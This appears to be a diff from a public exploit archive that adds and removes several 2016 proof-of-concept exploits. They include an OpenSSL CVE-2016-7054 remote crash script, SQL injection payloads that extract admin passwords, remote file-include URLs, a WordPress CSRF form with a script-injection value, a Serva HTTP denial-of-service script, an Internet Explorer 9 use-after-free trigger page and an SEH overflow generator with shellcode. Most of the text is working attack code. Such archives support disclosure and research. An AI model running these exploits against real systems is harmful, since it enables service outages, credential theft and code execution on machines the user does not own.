{"app_name":"Preferences","timestamp":"2016-09-20 01:11:44.56 +0200","app_version":"1","slice_uuid":"XXXXXXXXXXX","adam_id":0,"build_version":"1.0","bundleID":"com.apple.Preferences","share_with_app_devs":false,"is_first_party":true,"bug_type":"109","os_version":"iPhone OS 10.0.1 (14A403)","incident_id":"XXXXXXXXXXX","name":"Preferences"}
Incident Identifier: XXXXXXXXXXX
CrashReporter Key: XXXXXXXXXXX
Hardware Model: iPhone6,2
Process: Preferences [1517]
Path: /Applications/Preferences.app/Preferences
Identifier: com.apple.Preferences
Version: 1.0 (1)
Code Type: ARM-64 (Native)
Role: Foreground
Parent Process: launchd [1]
Coalition: com.apple.Preferences [754]
Date/Time: 2016-09-20 01:11:43.4478 +0200
Launch Time: 2016-09-20 01:10:54.3002 +0200
OS Version: iPhone OS 10.0.1 (14A403)
Report Version: 104
Exception Type: EXC_BAD_ACCESS (SIGSEGV)
Exception Subtype: KERN_INVALID_ADDRESS at 0x000000016fc6df90
Termination Signal: Segmentation fault: 11
Termination Reason: Namespace SIGNAL, Code 0xb
Terminating Process: exc handler [0]
Triggered by Thread: 0
---------------------------------------------------------------
Logs:
==============================
Sep 20 20:17:02 xscxsc com.apple.CoreSimulator.SimDevice.27D...8F.launchd_sim[1905] (com.apple.managedconfiguration.profiled[3085]): Service exited due to signal: Segmentation fault: 11
Sep 20 20:17:02 xscxsc MobileSafari[2870]: (Error) MC: Queue data for acceptance error. Error: NSError:
Desc : Couldnt communicate with a helper application.
Sugg : Try your operation again. If that fails, quit and relaunch the application and try again.
Domain : NSCocoaErrorDomain
Code : 4097
Extra info:
{
NSDebugDescription = "connection to service named com.apple.managedconfiguration.profiled";
}
Sep 20 20:17:02 xscxsc profiled[3133]: (Note ) profiled: Service starting...
==============================
--------------------------------------------------------------------------------------
4. PoC
https://cert.cx/appleios10/300k.php
https://cert.cx/appleios10/500k.php
https://cert.cx/appleios10/700k.php
https://cert.cx/appleios10/900k.php
or https://cert.cx/appleios10/expl.html
just click on this link by using Safari.
EDB Proofs of Concept Mirror:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40906.zip
--------------------------------------------------------------------------------------
5. Safari and sandbox
How is possible that safari don't ask user before run 'Preferences' app to start process of importing certificate? Safari automatically start new process without asking user for acceptance of this operation what can be exploited through http redirect to untrusted content.
--------------------------------------------------------------------------------------
6. References
CAPEC-44: Overflow Binary Resource File
https://capec.mitre.org/data/definitions/44.html
https://cert.cx/
https://cxsecurity.com/
Best Regards/Pozdrowienia/С наилучшими пожеланиями
Maksymilian Arciemowicz
References:
https://support.apple.com/HT207422
https://support.apple.com/HT207425
https://support.apple.com/HT207426
https://cert.cx/appleios10/300k.php
https://cert.cx/appleios10/500k.php
https://cert.cx/appleios10/700k.php
https://cert.cx/appleios10/900k.php
https://cert.cx/appleios10/expl.html
https://capec.mitre.org/data/definitions/44.html

123
platforms/linux/dos/40899.py Executable file
View file

@ -0,0 +1,123 @@
# Exploit Title: OpenSSL 1.1.0a & 1.1.0b Heap Overflow Remote DOS vulnerability
# Date: 11-12-2016
# Software Link: https://www.openssl.org/source/old/1.1.0/
# Exploit Author: Silverfox
# Contact: http://twitter.com/___Silverfox___
# Website: https://www.silverf0x00.com/
# CVE: CVE-2016-7054
# Category: Denial of Service
# Type: Remote
# Platform: Multiple
1. Description
Remote unauthenticated user can negotiate ChaCha20-Poly1305 cipher suites and send a message of sufficient length with a bad MAC to trigger the vulnerable code to zero out the heap space and force the vulnerable OpenSSL instance to crash.
https://blog.fortinet.com/2016/11/23/analysis-of-openssl-chacha20-poly1305-heap-buffer-overflow-cve-2016-7054
https://www.silverf0x00.com/overview-of-mac-algorithms-fuzzing-tls-and-finally-exploiting-cve-2016-7054-part-1/
2. Proof of Concept
a. Download and compile OpenSSL 1.1.0a or b
b. Run OpenSSL with the following switches: ./openssl-1.1.0a/bin/openssl s_server -cipher 'DHE-RSA-CHACHA20-POLY1305' -key cert.key -cert cert.crt -accept 443 -www -tls1_2 -msg
c. Download and run the exploit code (Under https://github.com/silverfoxy/tlsfuzzer package run test-cve-2016-7054.py at https://github.com/silverfoxy/tlsfuzzer/blob/master/scripts/test-cve-2016-7054.py)
d. OpenSSL Instance crashes causing DOS
### Exploit Code ###
'''
* In no event shall the author be liable
* for any direct, indirect, incidential, special, exemplary or
* consequential damages, including, but not limited to, procurement
* of substitute goods or services, loss of use, data or profits or
* business interruption, however caused and on any theory of liability,
* whether in contract, strict liability, or tort, including negligence
* or otherwise, arising in any way out of the use of this software,
* even if advised of the possibility of such damage.
'''
from __future__ import print_function
import traceback
import sys
from tlsfuzzer.runner import Runner
from tlsfuzzer.messages import Connect, ClientHelloGenerator, \
ClientKeyExchangeGenerator, ChangeCipherSpecGenerator, \
FinishedGenerator, ApplicationDataGenerator, \
fuzz_encrypted_message
from tlsfuzzer.expect import ExpectServerHello, ExpectCertificate, \
ExpectServerHelloDone, ExpectChangeCipherSpec, ExpectFinished, \
ExpectAlert, ExpectClose, ExpectServerKeyExchange
from tlslite.constants import CipherSuite, AlertLevel, AlertDescription
def usage() :
return 'Usage ./{} Destination_IP Destination_Port'.format(sys.argv[0])
def main():
if len(sys.argv) < 3:
print(usage())
return -1
conversations = {}
# 16 chars: POLY1305 tag 128 bit
# Tampering one bit suffices to damage the mac
# The payload has to be long enough to trigger heap overflow
n = 15000
fuzzes = [(-1, 1)]
for pos, val in fuzzes:
conversation = Connect(sys.argv[1], int(sys.argv[2]))
node = conversation
ciphers = [CipherSuite.TLS_DHE_RSA_WITH_CHACHA20_POLY1305_SHA256]
node = node.add_child(ClientHelloGenerator(ciphers))
node = node.add_child(ExpectServerHello())
node = node.add_child(ExpectCertificate())
node = node.add_child(ExpectServerKeyExchange())
node = node.add_child(ExpectServerHelloDone())
node = node.add_child(ClientKeyExchangeGenerator())
node = node.add_child(ChangeCipherSpecGenerator())
node = node.add_child(FinishedGenerator())
node = node.add_child(ExpectChangeCipherSpec())
node = node.add_child(ExpectFinished())
node = node.add_child(fuzz_encrypted_message(
ApplicationDataGenerator(b"GET / HTTP/1.0\n" + n * b"A" + b"\n\n"), xors={pos:val}))
node = node.add_child(ExpectAlert(AlertLevel.fatal,
AlertDescription.bad_record_mac))
node = node.add_child(ExpectClose())
conversations["XOR position " + str(pos) + " with " + str(hex(val))] = \
conversation
# run the conversation
good = 0
bad = 0
for conversation_name in conversations:
conversation = conversations[conversation_name]
#print(conversation_name + "...")
runner = Runner(conversation)
res = True
try:
runner.run()
except:
print("Error while processing")
print(traceback.format_exc())
res = False
if res:
good+=1
print("OK")
else:
bad+=1
print("Test end")
print("successful: {0}".format(good))
print("failed: {0}".format(bad))
if bad > 0:
sys.exit(1)
if __name__ == "__main__":
main()
### End of Exploit Code ###
3. Solution:
Update OpenSSL to version 1.1.0c or later, versions earlier than 1.1.0a are not affected by this vulnerability.

View file

@ -1,14 +0,0 @@
source: http://www.securityfocus.com/bid/15017/info
myBloggie is prone to an SQL injection vulnerability. This is due to a lack of sanitization of user-supplied input before passing it on to SQL queries.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
<HTML><BODY>
<form
action="http://www.example.com/myBloggie/index.php?mode=search"
method="post" name="search" onsubmit="return
checkForm(this)"><center><input type="text"
name="keyword" size="12" value="'SQLInjection"> <input
type="submit" value="Inject this"></center></form>
</BODY></HTML>

View file

@ -1,12 +0,0 @@
source: http://www.securityfocus.com/bid/18241/info
MyBloggie is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Update: Conflicting reports indicate that this issue does not exist in MyBloggie. This BID will be updated when more details are available.
http://www.example.com/blog/admin.php?mybloggie_root_path=[evil script]
http://www.example.com/blog/scode.php?mybloggie_root_path=[evil script]

27
platforms/php/webapps/40904.txt Executable file
View file

@ -0,0 +1,27 @@
# Exploit Title: SQL Injection In Smart Guard Network Manager Api
# Date: 03/12/2016
# Exploit Author: Rahul Raz
# Vendor Homepage: http://www.xsinfoways.com/
# Software Name: Smart Guard Network Manager
# Version: 6.3.2
# Tested on: Ubuntu Linux
Vulnerability type: CWE-89: Improper Neutralization of Special Elements
used in an SQL Command ('SQL Injection')
The menu_id GET parameter on <base url>/view_logs/search_all_history.php in
not filtered properly and leads to SQL Injection
Authentication Required: No
SQL injec type- error/xpath.
Any unauthenticated user can inject SQL commands on the <base-url>
/view_logs/search_all_history.php?menu_id=-466 and extractvalue(1,(select
make_set(511,0,SUBSTRING(password,1,20),1) from
login_master limit 0,1 ))-- -
So an user can fetch admin details and can easily get root on that server
if server is SmartGuard 6.0A Revolutions as php runs as user root by
default.
This this vulnerability can make whole server vulnerable .

View file

@ -0,0 +1,64 @@
<!--
Details
================
Software: Multisite Post Duplicator
Version: 0.9.5.1
Homepage: http://wordpress.org/plugins/multisite-post-duplicator/
Advisory report: https://security.dxw.com/advisories/csrf-vulnerability-in-multisite-post-duplicator-could-allow-an-attacker-to-do-almost-anything-an-admin-user-can-do/
CVE: Awaiting assignment
CVSS: 5.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:N)
Description
================
CSRF vulnerability in Multisite Post Duplicator could allow an attacker to do almost anything an admin user can do
Vulnerability
================
Contains a CSRF vulnerability which can copy content from one site of a multisite installation to another.
This could be used to add arbitrary HTML to the front-end of the site (which could be used for defacement, harvesting login credentials from authenticated users, or could be used to do virtually anything a logged-in admin user can do).
This could also be used to view content not meant to be published.
Proof of concept
================
Some of these values may need adjusting depending on the post IDs, blog IDs, etc.
-->
<form method=\"POST\" action=\"http://localhost/wp-admin/tools.php?page=mpd\">
<input type=\"text\" name=\"mpd-post-status\" value=\"draft\">
<input type=\"text\" name=\"mdp-prefix\" value=\"<script>alert(1)</script>\">
<input type=\"text\" name=\"action\" value=\"add_foobar\">
<input type=\"text\" name=\"el0\" value=\"post\">
<input type=\"text\" name=\"el1\" value=\"1\">
<input type=\"text\" name=\"el2\" value=\"1\">
<input type=\"text\" name=\"el3\" value=\"1\">
<input type=\"text\" name=\"duplicate-submit\" value=\"Duplicate\">
<input type=\"submit\">
</form>
<!--
Mitigations
================
Update to version 1.1.3 or later.
Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/
Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.
This vulnerability will be published if we do not receive a response to this report with 14 days.
Timeline
================
2016-11-01: Discovered
2016-12-07: Tested version 1.1.3 and found the plugin no longer vulnerable to the attack as described
2016-12-09: Advisory published
Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.
-->

72
platforms/windows/dos/40905.py Executable file
View file

@ -0,0 +1,72 @@
#!/usr/bin/env python
#
#
# Serva 3.0.0 HTTP Server Module Remote Denial of Service Exploit
#
#
# Vendor: Patrick Masotta
# Product web page: http://www.vercot.com
# Affected version: 3.0.0.1001 (Community, Pro, 32/64bit)
#
# Summary: Serva is a light (~3 MB), yet powerful Microsoft Windows application.
# It was conceived mainly as an Automated PXE Server Solution Accelerator. It bundles
# on a single exe all of the underlying server protocols and services required by the
# most complex PXE network boot/install scenarios simultaneously delivering Windows and
# non-Windows assets to BIOS and UEFI based targets.
#
# Desc: The vulnerability is caused by the HTML (httpd) module and how it handles TCP requests.
# This can be exploited to cause a denial of service attack resulting in application crash.
#
# ----------------------------------------------------------------------------
#
# (c1c.4bc): C++ EH exception - code e06d7363 (first chance)
# (c1c.4bc): C++ EH exception - code e06d7363 (!!! second chance !!!)
# *** WARNING: Unable to verify checksum for C:\Users\lqwrm\Desktop\Serva_Community_32_v3.0.0\Serva32.exe
# *** ERROR: Module load completed but symbols could not be loaded for C:\Users\lqwrm\Desktop\Serva_Community_32_v3.0.0\Serva32.exe
# eax=03127510 ebx=03127670 ecx=00000003 edx=00000000 esi=03127670 edi=031276a0
# eip=74a1c54f esp=03127510 ebp=03127560 iopl=0 nv up ei pl nz ac po nc
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000212
# KERNELBASE!RaiseException+0x58:
# 74a1c54f c9 leave
# 0:013> kb
# # ChildEBP RetAddr Args to Child
# 00 03127560 004abaaf e06d7363 00000001 00000003 KERNELBASE!RaiseException+0x58
# WARNING: Stack unwind information not available. Following frames may be wrong.
# 01 03127598 004cc909 031275b8 005e13e8 6ca23755 Serva32+0xabaaf
# 02 03127608 004085d3 0211ecf8 03127670 ffffffff Serva32+0xcc909
# 03 0312761c 004089a5 031276a0 fffffffd 00000004 Serva32+0x85d3
# 04 0312764c 00408f01 03127670 fffffffd 00000004 Serva32+0x89a5
# 05 03127698 00413b38 00000000 0040007a 00000000 Serva32+0x8f01
# 06 031277d8 00000000 00000000 00000000 00000000 Serva32+0x13b38
#
# ----------------------------------------------------------------------------
#
# Tested on: Microsoft Windows 7 Professional SP1 (EN)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2016-5378
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5378.php
#
#
# 17.11.2016
#
import sys,socket
if len(sys.argv) < 3:
print '\nUsage: ' + sys.argv[0] + ' <target> <port>\n'
print 'Example: ' + sys.argv[0] + ' 172.19.0.214 80\n'
sys.exit(0)
host = sys.argv[1]
port = int(sys.argv[2])
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((host, port))
s.settimeout(251)
s.send('z')
s.close

View file

@ -0,0 +1,47 @@
<!--
Source: http://blog.skylined.nl/20161212001.html
Synopsis
A specially crafted web-page can trigger a use-after-free vulnerability in Microsoft Internet Explorer 9. I did not investigate this vulnerability thoroughly, so I cannot speculate on the potential impact or exploitability.
Known affected software and attack vectors
Microsoft Internet Explorer 9
An attacker would need to get a target user to open a specially crafted web-page. Disabling Java­Script should prevent an attacker from triggering the vulnerable code path.
Details
This bug was found back when I had very little knowledge and tools to do analysis on use-after-free bugs, so I have no details to share. EIP revealed that this was a use-after-free vulnerability. I have included a number of reports created using a predecessor of Bug­Id below.
Repro.html:
-->
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=Emulate­IE7" >
<script>
function go() {
document.exec­Command('Select­All');
document.exec­Command('superscript');
set­Timeout(function() {
o­Sup­Element=document.get­Elements­By­Tag­Name('sup')[0];
o­Sup­Element.swap­Node(document.document­Element);
}, 0);
}
</script>
</head>
<body onload="go()">
<address></address>
<fieldset></fieldset>
</body>
</html>
<!--
Time-line
27 September 2012: This vulnerability was found through fuzzing.
3 December 2012: This vulnerability was submitted to EIP.
10 December 2012: This vulnerability was rejected by EIP.
12 December 2012: This vulnerability was submitted to ZDI.
25 January 2013: This vulnerability was acquired by ZDI.
15 February 2013: This vulnerability was disclosed to Microsoft by ZDI.
27 June 2013: This vulnerability was address by Microsoft in MS13-047.
12 December 2016: Details of this vulnerability are released.
-->

View file

@ -0,0 +1,32 @@
#!python
#####################################################################################
# Exploit title: 10-Strike Network File Search Pro 2.3 Registration code SEH exploit
# Date: 2016-12-10
# Vendor homepage: https://www.10-strike.com/network-file-search/help/pro.shtml
# Download: https://www.10-strike.com/network-file-search/network-file-search-pro.exe
# Tested on: Win7 SP1
# Author: malwrforensics
# Details: Help->Enter registration code... and paste the text from poc.txt
#####################################################################################
def write_poc(fname, buffer):
fhandle = open(fname , 'wb')
fhandle.write(buffer)
fhandle.close()
fname="poc.txt"
buf = '\x41' * 0xfe0
#########################
# Shellcode
# MessageBox ad infinitum
#########################
shellcode = ("\x68\x24\x3F\x30\x41\x58\x35\x70\x41\x70"
"\x41\x50\x59\x68\x41\x41\x41\x41\x58\x35"
"\x41\x41\x41\x41\x50\x50\x50\x50\x51\xC3")
junk = '\x41' * 0x5e
jmp = '\xeb\x82\x41\x41'
nseh = '\xec\x14\x40\x00'
buffer = buf + shellcode + junk + jmp + nseh
write_poc(fname, buffer)